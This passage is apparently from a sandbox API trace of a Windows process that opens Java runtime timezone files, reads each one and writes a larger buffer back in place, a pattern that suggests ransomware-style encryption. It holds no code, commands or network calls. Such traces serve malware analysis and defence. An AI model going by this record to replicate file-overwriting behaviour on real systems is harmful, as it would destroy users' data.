dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0118.572] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0118.572] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x41 [0118.572] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0118.572] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.572] ReleaseMutex (hMutex=0x168) returned 1 [0118.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sao_Tome", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0118.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sao_Tome", cchWideChar=8, lpMultiByteStr=0x1f735ac, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sao_Tome", lpUsedDefaultChar=0x0) returned 8 [0118.572] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x345f2bc*=0x41, lpOverlapped=0x0) returned 1 [0118.574] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0118.574] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0118.574] CloseHandle (hObject=0x1f0) returned 1 [0118.574] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Araguaina" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\araguaina"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0119.001] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0119.001] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x37c [0119.001] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0119.001] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.001] ReleaseMutex (hMutex=0x168) returned 1 [0119.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Araguaina", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0119.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Araguaina", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Araguaina", lpUsedDefaultChar=0x0) returned 9 [0119.001] ReadFile (in: hFile=0x20c, lpBuffer=0x1f4a978, nNumberOfBytesToRead=0x37c, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4a978*, lpNumberOfBytesRead=0x345f2bc*=0x37c, lpOverlapped=0x0) returned 1 [0119.227] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0119.227] WriteFile (in: hFile=0x20c, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x904, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x345f2d0*=0x904, lpOverlapped=0x0) returned 1 [0119.227] CloseHandle (hObject=0x20c) returned 1 [0119.227] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Salta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\salta"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0119.230] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0119.230] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x215 [0119.230] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0119.230] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.230] ReleaseMutex (hMutex=0x168) returned 1 [0119.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Salta", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Salta", cchWideChar=5, lpMultiByteStr=0x1f7accc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Salta", lpUsedDefaultChar=0x0) returned 5 [0119.230] ReadFile (in: hFile=0x20c, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x215, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x345f2bc*=0x215, lpOverlapped=0x0) returned 1 [0119.232] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0119.232] WriteFile (in: hFile=0x20c, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x79d, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x345f2d0*=0x79d, lpOverlapped=0x0) returned 1 [0119.232] CloseHandle (hObject=0x20c) returned 1 [0119.232] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0119.234] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0119.234] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x229 [0119.234] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0119.234] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.234] ReleaseMutex (hMutex=0x168) returned 1 [0119.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bahia", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bahia", cchWideChar=5, lpMultiByteStr=0x1f7accc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bahia", lpUsedDefaultChar=0x0) returned 5 [0119.235] ReadFile (in: hFile=0x20c, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x229, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x345f2bc*=0x229, lpOverlapped=0x0) returned 1 [0119.236] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0119.236] WriteFile (in: hFile=0x20c, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x7b1, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x345f2d0*=0x7b1, lpOverlapped=0x0) returned 1 [0119.236] CloseHandle (hObject=0x20c) returned 1 [0119.236] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boise" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boise"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0119.238] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0119.238] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x504 [0119.238] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0119.238] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.238] ReleaseMutex (hMutex=0x168) returned 1 [0119.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Boise", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Boise", cchWideChar=5, lpMultiByteStr=0x1f7accc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Boise", lpUsedDefaultChar=0x0) returned 5 [0119.241] ReadFile (in: hFile=0x20c, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x504, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x345f2bc*=0x504, lpOverlapped=0x0) returned 1 [0119.251] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0119.251] WriteFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xa8c, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f2d0*=0xa8c, lpOverlapped=0x0) returned 1 [0119.254] CloseHandle (hObject=0x20c) returned 1 [0119.260] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chihuahua" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chihuahua"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0119.262] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0119.262] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x330 [0119.262] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0119.262] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.262] ReleaseMutex (hMutex=0x168) returned 1 [0119.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chihuahua", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0119.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chihuahua", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Chihuahua", lpUsedDefaultChar=0x0) returned 9 [0119.262] ReadFile (in: hFile=0x20c, lpBuffer=0x1e943c8, nNumberOfBytesToRead=0x330, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e943c8*, lpNumberOfBytesRead=0x345f2bc*=0x330, lpOverlapped=0x0) returned 1 [0119.264] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0119.264] WriteFile (in: hFile=0x20c, lpBuffer=0x1ea3978*, nNumberOfBytesToWrite=0x8b8, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesWritten=0x345f2d0*=0x8b8, lpOverlapped=0x0) returned 1 [0119.264] CloseHandle (hObject=0x20c) returned 1 [0119.264] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Denver" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\denver"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0119.265] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0119.265] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x538 [0119.265] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0119.265] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.265] ReleaseMutex (hMutex=0x168) returned 1 [0119.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Denver", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0119.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Denver", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Denver", lpUsedDefaultChar=0x0) returned 6 [0119.265] ReadFile (in: hFile=0x20c, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x538, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x345f2bc*=0x538, lpOverlapped=0x0) returned 1 [0119.267] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0119.267] WriteFile (in: hFile=0x20c, lpBuffer=0x1e963d8*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesWritten=0x345f2d0*=0xac0, lpOverlapped=0x0) returned 1 [0119.271] CloseHandle (hObject=0x20c) returned 1 [0119.271] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Godthab" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\godthab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0119.275] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0119.275] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x40c [0119.275] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0119.275] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.275] ReleaseMutex (hMutex=0x168) returned 1 [0119.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Godthab", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0119.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Godthab", cchWideChar=7, lpMultiByteStr=0x1f7accc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Godthab", lpUsedDefaultChar=0x0) returned 7 [0119.275] ReadFile (in: hFile=0x20c, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x40c, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x345f2bc*=0x40c, lpOverlapped=0x0) returned 1 [0119.692] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0119.692] WriteFile (in: hFile=0x20c, lpBuffer=0x1eace08*, nNumberOfBytesToWrite=0x994, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesWritten=0x345f2d0*=0x994, lpOverlapped=0x0) returned 1 [0124.190] CloseHandle (hObject=0x20c) returned 1 [0124.190] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Halifax" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\halifax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0127.510] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0127.510] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x774 [0127.587] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0127.588] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.588] ReleaseMutex (hMutex=0x168) returned 1 [0127.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Halifax", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0127.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Halifax", cchWideChar=7, lpMultiByteStr=0x1f7acb4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Halifax", lpUsedDefaultChar=0x0) returned 7 [0127.588] ReadFile (in: hFile=0x1d4, lpBuffer=0x2882dd8, nNumberOfBytesToRead=0x774, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesRead=0x345f2bc*=0x774, lpOverlapped=0x0) returned 1 [0127.590] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0127.590] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xcfc, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f2d0*=0xcfc, lpOverlapped=0x0) returned 1 [0127.590] CloseHandle (hObject=0x1d4) returned 1 [0127.591] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vevay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vevay"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0127.592] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0127.593] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2d4 [0127.593] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0127.593] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.593] ReleaseMutex (hMutex=0x168) returned 1 [0127.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vevay", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vevay", cchWideChar=5, lpMultiByteStr=0x1f7acb4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Vevay", lpUsedDefaultChar=0x0) returned 5 [0127.593] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e943c8, nNumberOfBytesToRead=0x2d4, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e943c8*, lpNumberOfBytesRead=0x345f2bc*=0x2d4, lpOverlapped=0x0) returned 1 [0127.594] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0127.594] WriteFile (in: hFile=0x1d4, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x85c, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x345f2d0*=0x85c, lpOverlapped=0x0) returned 1 [0127.595] CloseHandle (hObject=0x1d4) returned 1 [0127.595] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Monticello" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\monticello"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0129.314] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0129.314] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4ec [0129.314] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0129.314] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.314] ReleaseMutex (hMutex=0x168) returned 1 [0129.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Monticello", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Monticello", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Monticello", lpUsedDefaultChar=0x0) returned 10 [0129.314] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f3e908, nNumberOfBytesToRead=0x4ec, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e908*, lpNumberOfBytesRead=0x345f2bc*=0x4ec, lpOverlapped=0x0) returned 1 [0129.328] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0129.328] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0xa74, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x345f2d0*=0xa74, lpOverlapped=0x0) returned 1 [0129.328] CloseHandle (hObject=0x1d4) returned 1 [0129.328] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Matamoros" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\matamoros"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 